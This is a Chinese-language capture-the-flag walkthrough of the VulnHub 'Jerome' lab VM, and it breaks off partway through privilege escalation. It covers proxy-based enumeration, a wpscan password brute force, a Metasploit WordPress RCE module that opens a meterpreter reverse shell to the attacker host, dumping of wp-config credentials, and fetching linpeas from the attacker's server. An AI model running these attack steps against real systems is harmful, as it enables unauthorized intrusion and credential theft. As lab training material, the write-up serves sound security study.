Jerome
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:fe:db:5e 1 60 PCS Systemtechnik GmbH
192.168.56.219 08:00:27:7f:57:f4 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.219
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.219 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-30 22:38 EST
Nmap scan report for 192.168.56.219
Host is up (0.000072s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
8080/tcp open http-proxy Squid http proxy 3.5.27
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.27
MAC Address: 08:00:27:7F:57:F4 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.84 seconds
NMAP扫描结果表明目标主机有1个开放端口:8080(HTTP),运行代理服务。
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir -u http://192.168.56.219:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --exclude-length 3592 -b 400
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.219:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 400
[+] Exclude Length: 3592
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/30 22:43:58 Starting gobuster in directory enumeration mode
===============================================================
Progress: 220324 / 220561 (99.89%)===============================================================
2022/12/30 22:47:22 Finished
===============================================================
看来需要将目标主机的8080端口设为代理,此时访问http://127.0.0.1,返回空白页面,但是有注释:
<!- Move along -->
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir -u http://127.0.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --proxy http://192.168.56.219:8080
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Proxy: http://192.168.56.219:8080
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/30 22:53:32 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 200) [Size: 7775]
Progress: 218971 / 220561 (99.28%)===============================================================
2022/12/30 22:54:20 Finished
=============================================================
发现/server-status目录
Apache Server Status for 127.0.0.1 (via 127.0.0.1)
Server Version: Apache/2.4.29 (Ubuntu)
Server MPM: prefork
Server Built: 2018-10-10T18:59:25
Current Time: Saturday, 31-Dec-2022 04:56:59 CET
Restart Time: Saturday, 31-Dec-2022 04:21:17 CET
Parent Server Config. Generation: 1
Parent Server MPM Generation: 0
Server uptime: 35 minutes 42 seconds
Server load: 0.98 0.54 0.23
Total accesses: 795722 - Total Traffic: 541.3 MB
CPU Usage: u28.69 s21.97 cu0 cs0 - 2.37% CPU load
371 requests/sec - 258.8 kB/second - 713 B/request
10 requests currently being processed, 5 idle workers
KWKKK__KKK_K..._K._.............................................
................................................................
......................
Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process
Srv PID Acc M CPU SS Req Conn Child Slot Client Protocol VHost Request
0-0 613 62/51818/51818 K 3.53 0 0 43.5 35.25 35.25 127.0.0.1 http/1.1 127.0.1.1:80 GET /ditechFP.txt HTTP/1.1
1-0 614 4/52040/52040 W 3.53 0 0 2.8 35.41 35.41 127.0.0.1 http/1.1 127.0.1.1:80 GET /server-status HTTP/1.1
2-0 992 77/38457/52167 K 2.69 0 0 54.0 26.21 35.50 127.0.0.1 http/1.1 127.0.1.1:80 GET /fsbo_news.html HTTP/1.1
3-0 993 44/38020/51573 K 2.66 0 0 30.8 25.91 35.09 127.0.0.1 http/1.1 127.0.1.1:80 GET /ditechFP.html HTTP/1.1
4-0 994 97/38376/51921 K 2.69 0 0 68.1 26.16 35.33 127.0.0.1 http/1.1 127.0.1.1:80 GET /fsbo_news.php HTTP/1.1
5-0 963 0/52228/52228 _ 3.55 0 0 0.0 35.53 35.53 127.0.0.1 http/1.1 127.0.1.1:80 GET /200602byauthor HTTP/1.1
6-0 977 0/51752/51752 _ 3.51 0 0 0.0 35.20 35.20 127.0.0.1 http/1.1 127.0.1.1:80 GET /004076.js HTTP/1.1
7-0 995 31/37502/38513 K 2.64 0 0 21.8 25.56 26.25 127.0.0.1 http/1.1 127.0.1.1:80 GET /ditech.php HTTP/1.1
8-0 996 4/36869/49899 K 2.60 0 0 2.8 25.14 33.96 127.0.0.1 http/1.1 127.0.1.1:80 GET /fsbo_news.js HTTP/1.1
9-0 980 81/50597/50597 K 3.47 0 0 56.7 34.43 34.43 127.0.0.1 http/1.1 127.0.1.1:80 GET /fsbo_news.txt HTTP/1.1
10-0 981 0/50967/50967 _ 3.49 0 0 0.0 34.68 34.68 127.0.0.1 http/1.1 127.0.1.1:80 GET /comment-post.txt HTTP/1.1
11-0 982 8/51049/51049 K 3.48 0 0 5.6 34.74 34.74 127.0.0.1 http/1.1 127.0.1.1:80 GET /fsbo_news.sh HTTP/1.1
12-0 - 0/0/12323 . 0.78 154 0 0.0 0.00 8.34 ::1 http/1.1 127.0.1.1:1337 OPTIONS * HTTP/1.0
13-0 - 0/0/12020 . 0.74 149 0 0.0 0.00 8.14 ::1 http/1.1 127.0.1.1:1337 OPTIONS * HTTP/1.0
14-0 - 0/0/910 . 0.05 201 0 0.0 0.00 0.61 ::1 http/1.1 127.0.1.1:1337 OPTIONS * HTTP/1.0
15-0 986 0/50290/50290 _ 3.43 0 0 0.0 34.22 34.22 127.0.0.1 http/1.1 127.0.1.1:80 GET /movingcompanies.html HTTP/1.1
16-0 987 64/50761/50761 K 3.49 0 0 45.0 34.54 34.54 127.0.0.1 http/1.1 127.0.1.1:80 GET /ditechFP.sh HTTP/1.1
17-0 - 0/0/12020 . 0.75 152 0 0.0 0.00 8.14 ::1 http/1.1 127.0.1.1:1337 OPTIONS * HTTP/1.0
18-0 989 0/50751/50751 _ 3.47 0 0 0.0 34.54 34.54 127.0.0.1 http/1.1 127.0.1.1:80 GET /32676.sh HTTP/1.1
19-0 - 0/0/1718 . 0.10 198 0 0.0 0.00 1.16 ::1 http/1.1 127.0.1.1:1337 OPTIONS * HTTP/1.0
20-0 - 0/0/405 . 0.01 203 0 0.0 0.00 0.27 ::1 http/1.1 127.0.1.1:1337 OPTIONS * HTTP/1.0
发现了127.0.0.1有1337端口
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir -u http://127.0.0.1:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --proxy http://192.168.56.219:8080 -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Proxy: http://192.168.56.219:8080
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,js,php
[+] Timeout: 10s
===============================================================
2022/12/30 23:00:25 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 290]
/.html (Status: 403) [Size: 291]
/index.html (Status: 200) [Size: 0]
/wordpress (Status: 301) [Size: 317] [--> http://127.0.0.1:1337/wordpress/]
Progress: 8355 / 1323366 (0.63%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/30 23:00:28 Finished
===============================================================
Gobuster工具扫描出1337端口下有个wordpress目录
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.56.219:8080 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Fri Dec 30 23:02:16 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.29 (Ubuntu)
| - X-Cache-Lookup: MISS from jerome:8080
| - Via: 1.1 jerome (squid/3.5.27)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] root
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jerome
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Dec 30 23:02:19 2022
[+] Requests Done: 51
[+] Cached Requests: 4
[+] Data Sent: 16.059 KB
[+] Data Received: 143.36 KB
[+] Memory used: 224.133 MB
[+] Elapsed time: 00:00:02
wpscan工具识别出两个用户名root以及jerome,看能否破解密码:
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.56.219:8080 -U root -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Fri Dec 30 23:03:22 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.29 (Ubuntu)
| - X-Cache-Lookup: MISS from jerome:8080
| - Via: 1.1 jerome (squid/3.5.27)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
^Cying root / sayyes Time: 00:17:23 < > (145935 / 14344392) 1.01% ETA: 28:12:23
[i] No Valid Passwords Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.> (145940 / 14344392) 1.01% ETA: 28:12:30
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Dec 30 23:20:49 2022
[+] Requests Done: 146086
[+] Cached Requests: 29
[+] Data Sent: 57.559 MB
[+] Data Received: 608.27 MB
[+] Memory used: 266.812 MB
[+] Elapsed time: 00:17:27
Scan Aborted: Canceled by User
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --url http://127.0.0.1:1337/wordpress --proxy http://192.168.56.219:8080 -U jerome -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Fri Dec 30 23:21:03 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.29 (Ubuntu)
| - X-Cache-Lookup: HIT from jerome:8080
| - Via: 1.1 jerome (squid/3.5.27)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - jerome / jerome
Trying jerome / jerome Time: 00:00:02 < > (420 / 14344812) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: jerome, Password: jerome
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Dec 30 23:21:10 2022
[+] Requests Done: 586
[+] Cached Requests: 4
[+] Data Sent: 224.011 KB
[+] Data Received: 1.85 MB
[+] Memory used: 264.891 MB
[+] Elapsed time: 00:00:06
只破解出jerome用户的密码,root用户没有破解出来。
登录jerome用户,发现该用户不是管理员用户。参考其他人的做法,利用metaspoit的一个模块实现shell的获取:
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http://192.168.56.219:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS localhost yes The target host(s), see https://github.com/rapid7/metasploit-framework/w
iki/Using-Metasploit
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
THEME_DIR no The WordPress theme dir name (disable theme auto-detection if provided)
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.206 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/wp_crop_rce) > set Proxies http:192.168.56.219:8080
Proxies => http:192.168.56.219:8080
msf6 exploit(multi/http/wp_crop_rce) > exploit
[*] Exploiting target 0.0.0.1
[*] Started reverse TCP handler on 192.168.56.206:5555
[-] http: The proxy returned a non-OK response
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Authenticating with WordPress using jerome:jerome...
[+] Authenticated with WordPress
[*] Preparing payload...
[-] The host (192.168.56.219:8080) was unreachable.
[-] Exploit aborted due to failure: not-found: Failed to access Wordpress page to retrieve theme.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http:192.168.56.219:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS localhost yes The target host(s), see https://github.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
THEME_DIR no The WordPress theme dir name (disable theme auto-detection if provided)
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.206 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http:192.168.56.219:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
THEME_DIR no The WordPress theme dir name (disable theme auto-detection if provided)
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.206 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/wp_crop_rce) >
msf6 exploit(multi/http/wp_crop_rce) > exploit
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Authenticating with WordPress using jerome:jerome...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (39927 bytes) to 192.168.56.219
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.219:42732) at 2022-12-30 23:43:58 -0500
shell[*] Attempting to clean up files...
meterpreter > shell
Process 1315 created.
Channel 1 created.
id
uid=1000(jerome) gid=1000(jerome) groups=1000(jerome),27(sudo)
这里特别注意,Proxies选项应当根据说明设置成: http:192.168.56.219:8080, 而不是url: http://192.168.56.219:8080
同时RHOSTS应当为127.0.0.1,否则执行会失败
meterpreter > shell
Process 1315 created.
Channel 1 created.
id
uid=1000(jerome) gid=1000(jerome) groups=1000(jerome),27(sudo)
which python
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
jerome@jerome:/var/www/html/wordpress$ ls
ls
KwBppbQNVC.php wp-activate.php wp-content wp-mail.php
SPBLmthcHr.php wp-admin wp-cron.php wp-settings.php
WpnKElxqGj.php wp-blog-header.php wp-includes wp-signup.php
index.php wp-comments-post.php wp-links-opml.php wp-trackback.php
license.txt wp-config-sample.php wp-load.php xmlrpc.php
readme.html wp-config.php wp-login.php
jerome@jerome:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'jerome');
/** MySQL database password */
define('DB_PASSWORD', 'jerome');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
define('AUTH_SALT', 'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT', 'put your unique phrase here');
define('NONCE_SALT', 'put your unique phrase here');
define('WP_AUTO_UPDATE_CORE', false);
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
jerome@jerome:/var/www/html/wordpress$ cd /home
cd /home
jerome@jerome:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Apr 16 2019 .
drwxr-xr-x 22 root root 4.0K Mar 31 2019 ..
drwxr-xr-x 4 jerome jerome 4.0K Apr 20 2019 jerome
jerome@jerome:/home$ cd jerome
cd jerome
jerome@jerome:/home/jerome$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 jerome jerome 4.0K Apr 20 2019 .
drwxr-xr-x 3 root root 4.0K Apr 16 2019 ..
-rw-r--r-- 1 jerome jerome 220 Apr 16 2019 .bash_logout
-rw-r--r-- 1 jerome jerome 3.7K Apr 16 2019 .bashrc
drwx------ 2 jerome jerome 4.0K Apr 16 2019 .cache
drwxrwxr-x 3 jerome jerome 4.0K Apr 16 2019 .local
-rw-r--r-- 1 jerome jerome 807 Apr 16 2019 .profile
-rw-r--r-- 1 jerome jerome 0 Apr 16 2019 .sudo_as_admin_successful
-rw-r--r-- 1 1001 1001 12 Apr 12 2019 flag.txt
jerome@jerome:/home/jerome$ cat flag.txt
cat flag.txt
b0ed001c825
jerome@jerome:/home/jerome$ sudo -l
sudo -l
[sudo] password for jerome: jerome
Sorry, try again.
[sudo] password for jerome: jerome
Sorry, try again.
[sudo] password for jerome: jerome
sudo: 3 incorrect password attempts
jerome@jerome:/home/jerome$
提权
将Linpeas.sh脚本上传至目标主机的/tmp目录,修改权限,并执行该脚本:
jerome@jerome:/home/jerome$ cd /tmp
cd /tmp
jerome@jerome:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
wget http://192.168.56.206:8000/linpeas.sh
--2022-12-31 05:47:53-- http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 747.87K --.-KB/s in 0.002s
2022-12-31 05:47:53 (306 MB/s) - 'linpeas.sh' saved [765823/765823]
jerome@jerome:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
jerome@jerome:/tmp$ ./linpeas.sh
输出结果中有下面的部分引起注意:
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
但没有收获。
jerome@jerome:/tmp$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=.:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
@reboot root /bin/bash /usr/share/simulate.sh
@reboot root dhclient
jerome@jerome:/tmp$
jerome@jerome:/tmp$ cat /usr/share/simulate.sh
cat /usr/share/simulate.sh
#
# This script simulates human behaviour from the root account
#
while true
do
cd /home/jerome;
ls;
sleep 120;
done
jerome@jerome:/tmp$ ls -alh /usr/share/simulate.sh
